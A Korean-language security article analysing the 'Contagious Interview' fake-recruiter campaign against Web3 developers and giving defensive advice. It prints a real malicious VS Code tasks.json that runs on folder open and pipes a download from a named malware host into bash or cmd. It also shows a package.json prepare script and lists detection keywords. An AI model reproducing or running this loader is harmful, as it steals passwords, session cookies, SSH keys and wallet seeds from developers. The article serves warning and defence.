전염성 인터뷰: 가짜 채용 담당자가 개발자를 해킹하는 법

요약: 국가 지원 공격의 새로운 물결이 암호화폐 시니어 개발자들을 강타하고 있습니다. 사기꾼들은 채용 담당자나 CTO를 사칭하여 후보자가 악성 코드를 열게 만듭니다. 이 글은 "Martin Erazo" 케이스, VS Code "tasks.json" 취약점, 그리고 생존에 필요한 "소각 프로토콜"을 분석합니다.

면책 조항: 이 기사는 실제 인물을 사칭한 특정 사이버 보안 사건을 보고합니다. "Martin Erazo"와 "Ara Vartanian"이라는 이름은 공격자가 사용한 페르소나 또는 신원을 나타냅니다. 우리는 이 이름을 가진 실제 인물들이 신원 도용의 무고한 피해자이며 악의적인 활동에 관여하지 않았다고 믿습니다.

---

---

1. 완벽한 미끼: "Martin Erazo" 페르소나

시니어에게 딱 맞는 메시지로 시작합니다:

• 역할: CTO / 수석 아키텍트.
• 예산: $6M 자금 확보.
• 스택: Web3, AI, 탈중앙화 인프라.

최근 확인된 공격에서, 채용 담당자 **"Martin Erazo"**가 LinkedIn을 통해 연락합니다. 프로필은 실제 연극 감독의 이름과 사진을 사용하지만, 작업 이력은 위조되었고 2025년에 갑자기 "IT 프로젝트 관리"로 바뀝니다 — 해킹되거나 구매된 계정의 전형적인 징후입니다.

사기는 빠르게 진행됩니다. 표준 HR 스크리닝을 건너뛰고 곧바로 최고 경영진과의 "기술 인터뷰"로 넘어갑니다 — 이 경우 실제 업계 CTO인 Ara Vartanian (현재 Limit Break)을 사칭합니다.

위험 신호: 프로젝트 이름이 계속 바뀝니다. 채용 담당자는 "Betfin" (GameFi 플랫폼)을 팔지만, 보낸 프레젠테이션(deck)은 "SpaceXView" (메타버스 프로젝트)용입니다. 이러한 불일치는 사기꾼들이 다른 캠페인 간에 자산을 재사용하고 있다는 증거입니다.

2. 함정: "우리 MVP 코드를 봐주세요"

가짜 "CTO"는 그들의 MVP 코드에 대한 당신의 전문적인 시각이 필요하다고 주장합니다. 그들은 GitHub 저장소 링크나 ZIP 압축 파일을 보냅니다. 그들은 인터뷰 도중이나 직후에 열어보라고 압박합니다.

여기가 공격이 일어나는 곳입니다.

그들은 당신의 도움을 주려는 의지와 자존심을 악용합니다. 당신은 React 컴포넌트에서 버그를 찾고 있다고 생각합니다. 실제로는 버그가 당신의 저축을 훔치기 위해 설계된 "기능"입니다.

3. 기술적 악용: 제로 클릭 맬웨어

공격자들은 개발 도구를 겨냥한 "제로 클릭" 또는 "로우 클릭" 취약점을 사용합니다. 앱을 실행할 필요가 없습니다. 단지 폴더를 열기만 하면 됩니다.

결정적 증거: .vscode/tasks.json

이 특정 사례에서 저장소에는 "장전된" .vscode/tasks.json 파일이 포함되어 있었습니다. 이 파일은 VS Code에게 프로젝트 빌드 방법을 알려줍니다.

악성 코드:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": 이것은 치명적인 트리거입니다. VS Code에서 폴더를 여는 순간, 이 작업이 자동으로 실행됩니다.
• 페이로드: curl을 사용하여 설정 API로 위장한 알려진 맬웨어 호스트 vscodesettingtask.vercel.app에서 스크립트를 다운로드합니다.
• 결과: 스크립트는 메모리에서 실행되어 Chrome 비밀번호, 세션 쿠키 및 SSH 키를 즉시 훔칩니다.

플랜 B: package.json 스크립트

VS Code 익스플로잇이 실패하면 그들은 npm 스크립트를 심어둡니다:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

npm install 또는 npm start를 실행하면 server/server.js가 활성화됩니다. 이는 로컬 C2(명령 및 제어) 스크립트로 환경 변수(AWS 키, 지갑 시드)를 공격자에게 유출합니다.

4. 위험 신호 대 안전 신호

너무 늦기 전에 어떻게 알아챌 수 있을까요?

개발자라면 "비공개 저장소"나 ZIP 파일은 최대 경보를 울려야 합니다. 합법적인 회사는 공개 저장소나 표준 플랫폼을 통한 과제를 사용합니다.

경고: 개발자를 공격하는 방법은 이것만이 아닙니다. Discord의 협력자 함정과 공급망 공격이 의존성을 어떻게 손상시키는지 읽어보세요.

5. 보안 프로토콜: 안전하게 인터뷰하는 법

시니어 개발자라면 당신은 표적이 될 것입니다. 환경 강화는 필수입니다.

프로토콜 1: "일회용" 환경 (Burner Environment)

절대 메인 워크스테이션을 코드 테스트에 사용하지 마세요.

• 가상 머신: VirtualBox 또는 VMWare를 사용하세요.
• 클라우드 IDE: GitHub Codespaces 또는 Gitpod를 사용하세요. 이것들은 일시적이며 로컬 지갑 파일과 격리되어 있습니다.

프로토콜 2: 포렌식 감사

낯선 코드를 열기 전에:

1. .vscode/tasks.json 확인: runOn: folderOpen을 찾으세요.
2. package.json 확인: 의심스러운 preinstall 또는 postinstall 스크립트를 찾으세요.
3. 키워드 검색: curl, wget, os.homedir(), .ssh, wallet으로 grep 하세요.

프로토콜 3: VS Code 강화

"Workspace Trust"를 전역적으로 비활성화하세요.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
• 이렇게 하면 VS Code가 폴더 수준 작업을 실행하기 전에 승인을 요청합니다.

6. 치료법: "소각 프로토콜"

악성 저장소를 열었다면("Martin Erazo" 페르소나가 보낸 것과 같은), 손상되었다고 가정하세요. 시스템 롤백으로는 부족합니다.

1. 연결 끊기: 이더넷 케이블을 즉시 뽑으세요.
2. 지갑 소각: 개인 키가 유출되었습니다. 깨끗한 장치(폰)에서 새 지갑을 만들고 남은 자금을 이동하세요. 오래된 시드는 다시는 사용하지 마세요.
3. 세션 킬: Google, GitHub, AWS의 모든 기기에서 로그아웃하세요. 모든 활성 세션을 철회하세요.
4. SSH 키 감사: GitHub/GitLab 설정을 확인하세요. 공격자들은 종종 백도어 접근을 유지하기 위해 그들의 SSH 키를 추가합니다. 모르는 것은 모두 삭제하세요.
5. 완전 삭제 (Nuke It): 디스크를 포맷하고 OS를 재설치하세요. 루트킷이 사라졌다고 100% 확신할 수 있는 유일한 방법입니다.

결론

"전염성 인터뷰" 사기는 당신의 전문 지식을 무기로 사용합니다. 문제 해결에 대한 당신의 욕구를 노립니다. 하지만 Web3에서 편집증은 직업적 미덕입니다. 모든 신원을 확인하고, 모든 저장소를 "샌드박스"에 넣고, 코드를 작성하라고 재촉하는 "채용 담당자"를 절대 신뢰하지 마세요.